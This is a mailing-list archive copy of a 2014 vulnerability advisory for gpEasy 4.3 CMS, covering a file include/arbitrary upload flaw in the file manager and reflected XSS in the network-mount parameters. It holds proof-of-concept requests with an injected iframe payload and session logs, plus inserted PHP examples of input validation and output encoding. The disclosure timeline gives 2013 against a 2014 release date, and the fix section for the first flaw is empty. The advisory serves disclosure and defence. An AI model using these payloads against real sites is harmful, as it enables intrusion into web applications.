Full Disclosure mailing list archives

gpEasy v4.3.x CMS - Multiple Web Vulnerabilities


From: Vulnerability Lab <research () vulnerability-lab com>
Date: Fri, 07 Feb 2014 12:31:27 +0100

Document Title:
===============
gpEasy v4.3.x CMS - Multiple Web Vulnerabilities


References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1189


Release Date:
=============
2014-02-06


Vulnerability Laboratory ID (VL-ID):
====================================
1189


Common Vulnerability Scoring System:
====================================
6.1


Product & Service Introduction:
===============================
gpEasy 4.3 is a complete content management system that lets users create rich and flexible Web sites with a simple and easy-to-use interface. The embedded design of the admin interface allows users to instantly see changes in a single browser window. gpEasy has many qualities, but if we had to pick three adjectives to describe our CMS, it would have to be fast, easy and free. These three small words represent big ideas for us and embody the principles that drive gpEasy development.

(Copy of the Vendor Homepage: http://www.gpeasy.com/Fast_Easy_and_Free )


Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official gpEasy v4.3 content management system.


Vulnerability Disclosure Timeline:
==================================
2013-02-06:    Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Affected Product(s):
====================
gpEasy
Product: gpEasy Content Management System (Web Application) 4.3


Exploitation Technique:
=======================
Remote


Severity Level:
===============
High


Technical Details & Description:
================================
1.1
A local file include and an arbitrary file upload vulnerability have been discovered in the official gpEasy v4.3 content management system. The local file include vulnerability allows remote attackers to include local files or paths, or system-specific path commands, without authorization and thereby compromise the web application. The arbitrary file upload issue allows remote attackers to upload files with multiple extensions, bypassing the web server's or system's validation.

The vulnerability is located in the `file- and folder` name values of the `upload files` module. Attackers can tamper with the POST request to upload their own malicious script code or web shells. The validation also has no filter for multiple file extensions, which allows a prepared, combined attack that includes a file and uploads/executes arbitrary code. The security risk of the local and remote vulnerability is estimated as high with a CVSS (Common Vulnerability Scoring System) count of 6.1(-).

Exploitation of the local file include and arbitrary file upload vulnerability requires no user interaction, but it does require a privileged web application user account. Successful exploitation results in application or DBMS compromise through combined LFI/AFU attacks.

Request Method(s):
                                [+] POST

Vulnerable Module(s):
                                [+] Home > Administration > Uploaded Files

Vulnerable Parameter(s):
                                [+] file- and folder name

Affected Module(s):
                                [+] Upload File Manager 
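The two weaknesses described in 1.1 (names that are not restricted to a single path component, and no check for stacked extensions) are both closed by validating the file or folder name before it reaches the file system. The following is an added example written for this advisory; it is not gpEasy or elFinder code. The allow-list of extensions, the function name and the sample inputs are assumptions chosen for illustration (PHP 7.1+ syntax).

```php
<?php
// Added example, not gpEasy/elFinder code: validate a user-supplied file or
// folder name before it is used for mkdir or for storing an upload.
// ALLOWED_EXTENSIONS is an assumed allow-list for illustration.

const ALLOWED_EXTENSIONS = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt'];

/**
 * Returns the validated name or throws InvalidArgumentException.
 * Pass $isFolder = true for a folder name (no extension check).
 */
function validate_upload_name(string $name, bool $isFolder = false): string
{
    // Reject NUL bytes and other control characters outright; a NUL can
    // truncate the name at the file-system layer.
    if (preg_match('/[\x00-\x1F\x7F]/', $name)) {
        throw new InvalidArgumentException('control character in name');
    }
    // A name is exactly one path component: no separators, no traversal.
    if ($name === '' || $name === '.' || $name === '..'
        || strpbrk($name, "/\\") !== false) {
        throw new InvalidArgumentException('path separator or traversal in name');
    }
    // Keep the character set small: letters, digits, dot, dash, underscore, space.
    if (!preg_match('/^[A-Za-z0-9 ._-]{1,100}$/', $name)) {
        throw new InvalidArgumentException('disallowed character in name');
    }
    // Hidden files such as .htaccess must not be created by uploaders.
    if ($name[0] === '.') {
        throw new InvalidArgumentException('leading dot not allowed');
    }
    if ($isFolder) {
        return $name;
    }
    // Exactly one extension, taken from the allow-list. "shell.php.jpg"
    // has two extensions and is rejected, which removes the multiple-
    // extension bypass described above.
    $parts = explode('.', $name);
    if (count($parts) !== 2 || $parts[0] === '') {
        throw new InvalidArgumentException('file name must have exactly one extension');
    }
    if (!in_array(strtolower($parts[1]), ALLOWED_EXTENSIONS, true)) {
        throw new InvalidArgumentException('extension not allowed');
    }
    return $name;
}

// Constructed sample inputs: the first two are accepted, the rest rejected.
$samples = [
    ['report.pdf', false],
    ['Holiday 2014', true],
    ['shell.php.jpg', false],
    ['../../index.php', true],
    ['.htaccess', false],
    ["image.jpg\0.php", false],
];
foreach ($samples as [$candidate, $isFolder]) {
    try {
        printf("accepted: %s\n", validate_upload_name($candidate, $isFolder));
    } catch (InvalidArgumentException $e) {
        printf("rejected: %s (%s)\n", addcslashes($candidate, "\0..\37"), $e->getMessage());
    }
}
```

The check runs on the server, on the final name that will be written, so a tampered POST body is caught regardless of what the browser-side file manager displayed. Pairing it with a storage directory that has script execution disabled keeps a slip in the allow-list from becoming code execution.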


1.2
Multiple client-side cross site scripting vulnerabilities have been discovered in the official gpEasy v4.3 content management system. A non-persistent cross site scripting vulnerability allows remote attackers to manipulate client-side browser requests through the affected web application.

The vulnerability is located in the `mount network volume` function of the `content > upload files` module. The vulnerable input field values are `host`, `port`, `path`, `user` and `pass`. Remote attackers can manipulate the GET request of the `mount network volume` function to provoke an incorrectly encoded exception that executes the injected script code. The code executes in the invalid error message exception of the mount network volume function. The security risk of the remote XSS vulnerability is estimated as medium with a CVSS (Common Vulnerability Scoring System) count of 2.9(+).

Request Method(s):
                                [+] GET

Vulnerable Module(s):
                                [+] Home > Administration > Uploaded Files > Mount Network Volume

Vulnerable Parameter(s):
                                [+] host
                                [+] port
                                [+] path
                                [+] user
                                [+] pass

Affected Module(s):
                                [+] Error invalid Content Exception


Proof of Concept (PoC):
=======================
1.1
The file include and arbitrary file upload vulnerability can be exploited by a local attacker with a privileged user account and without user interaction.
For security demonstration or to reproduce the vulnerability, follow the steps and information provided below.


PoC:

<div style="height: 746px;" class="finder-cwd-wrapper"><div style="height: 744px;" unselectable="on" 
class="ui-helper-clearfix finder-cwd ui-selectable ui-droppable finder-cwd-view-icons"><div id="tmp_57646" 
class="finder-cwd-file  directory ui-corner-all finder-cwd-file-tmp ui-selectee ui-state-disabled" title="Today 17:0">
<div class="finder-cwd-file-wrapper ui-corner-all"><div class="finder-cwd-icon finder-cwd-icon-directory ui-corner-all" 
unselectable="on"></div></div><div class="finder-cwd-filename" title="untitled folder">>"<[FILE INCLUDE VULNERABILITY 
VIA PATH]</div></div>



--- PoC Session Logs [POST] ---
Status: 200[OK]
GET http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=mkdir&name=[FILE INCLUE 
VULNERABILITY!+]&target=[#PENG!]l1_Lw&_=1391616013488 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime 
Type[text/html]
   Request Header:
      Host[demo-31ca1a14f3ab75.gpeasy.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
      Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a; 
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 05 Feb 2014 16:00:26 GMT]
      Server[Apache/2.2.24 (Unix)]
      X-Powered-By[PHP/5.3.3]
      Expires[Wed, 5 Feb 2014 16:00:26 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Last-Modified[Wed, 05 Feb 2014 16:00:26 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]



1.2
The cross site scripting vulnerability can be exploited by remote attackers without a privileged user account and with medium or high user interaction.
For security demonstration or to reproduce the vulnerability, follow the steps and information provided below.

Example PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22[CLIENT-SIDE INJECTED 
SCRIPT CODE!]%3E&port=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E
&path=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&user=%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E&pass=%22[CLIENT-SIDE 
INJECTED SCRIPT CODE!]%3E&_=1391619422697

PoC:
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E
&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697


PoC: Source Admin_Finder? - Exception 

<html><head></head><body>{"error":["errNetMount","\"><%22[CLIENT-SIDE INJECTED SCRIPT CODE!]%3E">",
"Unable to connect to FTP server \"><%22[CLIENT-SIDE INJECTED SCRIPT 
CODE!]%3E>"],"debug":{"connector":"php","phpver":"5.3.3","time":0.25530505180359,
"memory":"7415Kb \/ 7365Kb \/ 
128M","upload":"","volumes":[{"id":"l1_","name":"localfilesystem","imgLib":"gd"}],"mountErrors":[]}}</iframe></body></html>


--- PoC Session Logs [GET] ---
Status: 200[OK]
GET 
http://gpeasy.localhost:8622/Admin_Finder?verified=a78309cc12&cmd=netmount&protocol=ftp&host=%22%3E%3Ciframe+src%3Da%3E&port=%22%3E%3Ciframe+src%3Da%3E&path=%2F%22%3E%3Ciframe+src%3Da%3E&user=%22%3E%3Ciframe+src%3Da%3E&pass=%22%3E%3Ciframe+src%3Da%3E&_=1391619422697
 Load Flags[LOAD_BACKGROUND  ] Größe des Inhalts[-1] Mime Type[text/html]
   Request Header:
      Host[demo-31ca1a14f3ab75.gpeasy.com]
      User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:26.0) Gecko/20100101 Firefox/26.0]
      Accept[application/json, text/javascript, */*; q=0.01]
      Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
      Accept-Encoding[gzip, deflate]
      X-Requested-With[XMLHttpRequest]
      Referer[http://demo-31ca1a14f3ab75.gpeasy.com/Admin_Uploaded]
      Cookie[demo-31ca1a14f3ab75=eab8166b0a152ac27b9c0136a5e45478d1c5dff8a499c6265ec407d655526762b9845a1a; 
gpEasy_53ef13dc235a=4CPb4xGrLOKfN2YR0O8HdxJqnzVUqNrck5PwFKfQ]
      Connection[keep-alive]
   Response Header:
      Date[Wed, 05 Feb 2014 16:57:15 GMT]
      Server[Apache/2.2.24 (Unix)]
      X-Powered-By[PHP/5.3.3]
      Expires[Wed, 5 Feb 2014 16:57:15 GMT]
      Cache-Control[no-store, no-cache, must-revalidate, post-check=0, pre-check=0]
      Pragma[no-cache]
      X-Frame-Options[SAMEORIGIN]
      Content-Encoding[gzip]
      Vary[Accept-Encoding]
      Last-Modified[Wed, 05 Feb 2014 16:57:15 GMT]
      Connection[close]
      Transfer-Encoding[chunked]
      Content-Type[text/html; charset=utf-8]


Solution - Fix & Patch:
=======================
1.1.


1.2
The second vulnerability can be patched by securely parsing and encoding the output of the invalid-context exception handling.
Parse and filter the GET request input fields for the vulnerable host, path, pass, user and port parameters.
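The PoC response above shows the root cause: the `{"error":[...]}` body is wrapped in `<html><body>` tags, served as `text/html`, and carries the raw `host` value inside the error string, so a value that closes the string and opens a tag is rendered by the browser. The following is an added example written for this advisory, not gpEasy or elFinder code, contrasting that pattern with a hardened handler. Function names, the validation rules for `host` and `port`, and the constructed input are assumptions for illustration (PHP 7+).

```php
<?php
// Added example, not gpEasy/elFinder code. Function and parameter names are
// assumptions; the response shape mirrors the {"error":[...]} body quoted in
// the PoC. $p holds the already URL-decoded GET parameters.

// BEFORE (the pattern visible in the PoC): JSON wrapped in HTML, declared as
// text/html, with the raw host value concatenated into the error message.
function netmount_error_unsafe(array $p): array
{
    $msg  = 'Unable to connect to FTP server ' . $p['host'];
    $body = '<html><head></head><body>'
          . '{"error":["errNetMount","' . $p['host'] . '","' . $msg . '"]}'
          . '</body></html>';
    return ['headers' => ['Content-Type: text/html; charset=utf-8'], 'body' => $body];
}

// AFTER: validate the fields that have a natural shape, never echo a rejected
// value, encode whatever is reflected, and declare the body as JSON.
function netmount_error_safe(array $p): array
{
    $errors = ['errNetMount'];

    // Host: hostname characters only, or a valid IP literal.
    $host = $p['host'] ?? '';
    if (!preg_match('/^[A-Za-z0-9.-]{1,253}$/', $host)
        && filter_var($host, FILTER_VALIDATE_IP) === false) {
        $errors[] = 'Invalid host name';
        $host = '';
    }
    // Port: integer in 1..65535, nothing else.
    $port = filter_var($p['port'] ?? '', FILTER_VALIDATE_INT,
                       ['options' => ['min_range' => 1, 'max_range' => 65535]]);
    if ($port === false) {
        $errors[] = 'Invalid port';
    }
    // path/user are free-form and only ever pass through the encoder below;
    // pass is a secret and is not reflected at all.
    if ($host !== '' && $port !== false) {
        $errors[] = 'Unable to connect to FTP server ' . $host;
    }

    // JSON_HEX_* escapes < > & ' " as \u00XX, so even a client that drops the
    // message into the page with innerHTML receives inert text.
    $body = json_encode(['error' => $errors],
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT);

    return [
        'headers' => [
            'Content-Type: application/json; charset=utf-8',
            'X-Content-Type-Options: nosniff',   // no MIME sniffing into HTML
        ],
        'body' => $body,
    ];
}

// Constructed input: the PoC payload, URL-decoded, in every parameter.
$payload = '"><iframe src=a>';
$attack  = ['host' => $payload, 'port' => $payload, 'path' => '/' . $payload,
            'user' => $payload, 'pass' => $payload];

$unsafe = netmount_error_unsafe($attack);
$safe   = netmount_error_safe($attack);
echo 'unsafe body contains a raw <iframe>: ',
     var_export(strpos($unsafe['body'], '<iframe') !== false, true), "\n";   // true
echo 'safe body contains any raw "<":     ',
     var_export(strpos($safe['body'], '<') !== false, true), "\n";           // false
echo $safe['body'], "\n";   // {"error":["errNetMount","Invalid host name","Invalid port"]}
```

Two of the three changes are independent of the validation: an `application/json` Content-Type (with `nosniff`) means the browser never parses the response as a document even if encoding is missed, and `JSON_HEX_*` encoding keeps the reflected values inert when the file manager's JavaScript later writes the message into the page.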


Security Risk:
==============
1.1
The security risk of the local file include and arbitrary file upload web vulnerability is estimated as high(-).

1.2
The security risk of the client-side cross site scripting vulnerabilities is estimated as medium(-).


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () evolution-sec com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com           - www.vuln-lab.com                             - www.evolution-sec.com
Contact:    admin () vulnerability-lab com      - research () vulnerability-lab com            - admin () evolution-sec com
Section:    www.vulnerability-lab.com/dev       - forum.vulnerability-db.com                   - magazine.vulnerability-db.com
Social:     twitter.com/#!/vuln_lab             - facebook.com/VulnerabilityLab                - youtube.com/user/vulnerability0lab
Feeds:      vulnerability-lab.com/rss/rss.php   - vulnerability-lab.com/rss/rss_upcoming.php   - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin () vulnerability-lab com or research () vulnerability-lab com) to get a permission.

                                Copyright © 2014 | Vulnerability Laboratory [Evolution Security]



-- 
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research () vulnerability-lab com


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/